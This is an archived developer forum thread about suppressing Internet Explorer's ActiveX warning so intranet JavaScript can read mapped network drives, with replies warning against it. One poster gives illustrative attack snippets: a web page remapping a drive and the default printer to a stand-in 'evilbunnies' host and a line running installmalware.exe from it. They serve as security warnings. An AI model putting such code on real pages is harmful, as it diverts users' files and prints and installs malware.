Coffeehouse Thread

16 posts

Forum Read Only

This forum has been made read only by the site admins. No new threads or comments can be added.

ActiveXObject

Back to Forum: Coffeehouse
  • User profile image
    pavone

     I have the following javascript:

    var WshNetwork = new ActiveXObject("WScript.Network");
    var Drives = WshNetwork.EnumNetworkDrives();

    Which gives me this warning:
    "An ActiveX control on this page might be unsafe to interact with other parts of the page. Do you want to allow this interaction?  YES  NO"

    Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?

     

  • User profile image
    blowdart

    , pavone wrote

     I have the following javascript:

    1
    2
    var WshNetwork = new ActiveXObject("WScript.Network");
    var Drives = WshNetwork.EnumNetworkDrives();

    Which gives me this warning:
    "An ActiveX control on this page might be unsafe to interact with other parts of the page. Do you want to allow this interaction?  YES  NO"

    Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?

    Oh boy. You want to do that in javascript? Please don't. By turning that warning off you would allow any web site to start running commands against your network. Not, I think, something you want to do.

     

  • User profile image
    AndyC

    @blowdart: +1

    I'm a tad afraid to ask why you'd ever want to do that in the first place?

  • User profile image
    pavone

     No other way to do what I need I'm afraid. Not the method I'd prefer of doing it either, but I'm just the junior code monkey following instructions. 

    Preferably I'd like that message turned off for my site only, an intranet site which only allows access to a few selected people. But any method to turn that message off would work, I'll leave it to the users whether they want to or not. 

    What I'm doing is, reading users' mapped drives to the actual UNC paths so I can copy files from whatever mapped path they select. 

  • User profile image
    AndyC

    The only way to do exactly that would be to mark the WSH object as "Safe for Scripting", which would basically hand complete and total control of the PC over to any webpage that fancied it. Which would be an epically bad idea by anyone's standards.

    For a very limited usage scenario, and given that your end user's are clearly using IE, why not just create a custom ActiveX control marked as safe-for-scripting that performs the correct drive enumeration for you? Given it'll be internal only, it's very unlikely some random website would prod at and even if they did, it'd only offer very constrained functionality rather than that provided by a generic scripting control.

  • User profile image
    felix9

    , pavone wrote

    Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?

    Add this site to the trusted zone. not automatically, but you can ask the user to do it.

  • User profile image
    evildictait​or

    Try putting the code you want to run in a JS file, and then asking the users to download the script and run it on their machine.

    At least then your users would be choosing to hand their machine to the website on a site-by-site basis.

    If you have any kind of security policy at your work, you will certainly be breaching it by marking things like WScript.Network as "Safe for Scripting".

  • User profile image
    figuerres

    , pavone wrote

     No other way to do what I need I'm afraid. Not the method I'd prefer of doing it either, but I'm just the junior code monkey following instructions. 

    Preferably I'd like that message turned off for my site only, an intranet site which only allows access to a few selected people. But any method to turn that message off would work, I'll leave it to the users whether they want to or not. 

    What I'm doing is, reading users' mapped drives to the actual UNC paths so I can copy files from whatever mapped path they select. 

    then please please talk to the boss about this .... point out that multiple developers are all saying this is really not a good idea, some of us have been developing for a *LONG TIME* like over 20 years and we know what we are saying. also one of the folks here who is saying this works for microsoft and knows a thing or two about web servers ....

    I know that in some places there is a trend to "do it all in a web page" as that removes the need to deploy software on desktops and they think that is the way to go... sometimes that is true but not all the time.

    one of the reasons that some folks used to bash Microsoft was they used to just let you run anything you wanted with very little to stop the user from totally f**** ing them selves.

    this is not a good idea,  if you start allowing script on a web page to have local machine access rights then you become wide open to all kinds of evil attacks .....

    if you let it enumerate drives what else can it do ? you might also then be allowing a command to format a drive or delete files or copy stuff w/o asking the user for permsssion.

    please re-think this.

     

  • User profile image
    blowdart

    , figuerres wrote

    also one of the folks here who is saying this works for microsoft and knows a thing or two about web servers ....

    And has written a book on web security.

     

    And yes, once you all wscript you allow deletion of files, copying of files, generally messing around with the file system, network drives, all sorts of other fun things.

  • User profile image
    evildictait​or

    <html>
      <head><title>Look! Dancing bunnies!</title></head>
      <body>
        <img src="http://www.evilbunnies.com/picture.gif" width=100 height=100 />
        <script>
    var objNet = new ActiveXObject("WScript.Network");
    objNet.RemoveNetworkDrive("Z:"); // remove the "customer information" drive
    objNet.MapNetworkDrive("Z:", "\\evilbunnies.com\netdrive\"); // replace it with an Internet drive

    var user = objNet.Username;

      setTimeout("alert('Oi! "+user+"! This is the head of IT, noticing that you're not doing work! Get back to work putting client data in the Z: drive, or I'll have your head!')", 1000);
       </script>
    </body></html>

  • User profile image
    evildictait​or

    Also:

    objNet.AddWindowsPrinterConnection("\\evilbunnies\printer");
    objNet.SetDefaultPrinter("\\evilbunnies\printer");
    alert("Shouldn't you get back to work, printing out your private emails and documents?");

  • User profile image
    evildictait​or

    Blowdart said:

    And yes, once you all wscript you allow deletion of files, copying of files, generally messing around with the file system, network drives, all sorts of other fun things.

    WScript is even worse than WScript.Network:

    WScript.Exec("\\evilbunnies.com\installmalware.exe", 0);

    Sad times for your business if you allow it from the Internet zone Sad

  • User profile image
    evildictait​or

    Pavone said:

    but I'm just the junior code monkey following instructions. 

    You're the junior code money who will be fired when your company gets owned up by your foolish actions.

    Don't play the game of "it'll never happen to me" or "security is just some theoretical risk". People can and do own-up small companies, and when it happens to yours, your fingerprints will be on the trigger when the CEO comes looking for a scapegoat.

    Play it safe. Make sure you play no part in a decision that could very well lead to your company losing all of it's trade secrets and customer details. You really don't want to be the guy that let that happen.

  • User profile image
    Charles

    Why does this LOB app have to be web page?

    C

  • User profile image
    pavone

     I made another version where the only difference is that it requires a UNC path and makes no use of ActiveX whatsoever, if the client is fine with it, then it's all good. 

    If not, then how effective would it be to let this site into their Trusted Sites, and such only this website could make use of this ActiveX object? I noticed that this website already works in our network with the only caveat of producing a pop-up asking for confirmation, so it's not like I need to make any changes to the systems as I initially thought. Recall that this is an intranet site, no one will change internet zones. 

    Regards 

     

    -- Update ---

    Looks like browse with UNC path will do fine.

    Thanks for the feedback.

  • User profile image
    figuerres

    , Charles wrote

    Why does this LOB app have to be web page?

    C

     

    well i am guessing here based on what the OP has posted so far:  they like using web pages at that company.

    I have seen this kind of thinking many times before Charles.   for example i worked at one point on an app for a fairly large business and the app had to get data from 2 different web sites  by driving websites around ( lot's of crazy code doing web posts / gets and forms) to then get them to send back comma delimited data replies that i then had to clean up and import the data into a database.

    the suppliers did not have a simple way to pull a data feed any other way, they included FedEx.  the data was not the normal shipping data, this had to do with cargo ships bills of lading originating in china coming to ports on the US east coast.

    when i was brought in the app did not automate importing the data, humans had to follow a 25 to 30 step manual process. errors in that process did not show up for weeks.... i made it a 5 step process that reduced the errors and the time it took them.

    it took 2 months to get them to ok using .net on 3 computers to run the app.

    as a consultant i had to play nice and get the staff happy with the idea, in the end they loved what i was doing and all that but then the business was sold and we all moved on to other stuff.

    this was a business that had probably 10,000 desktop pc's running Windows 2000 Pro in 2005-2006

Conversation locked

This conversation has been locked by the site admins. No new comments can be made.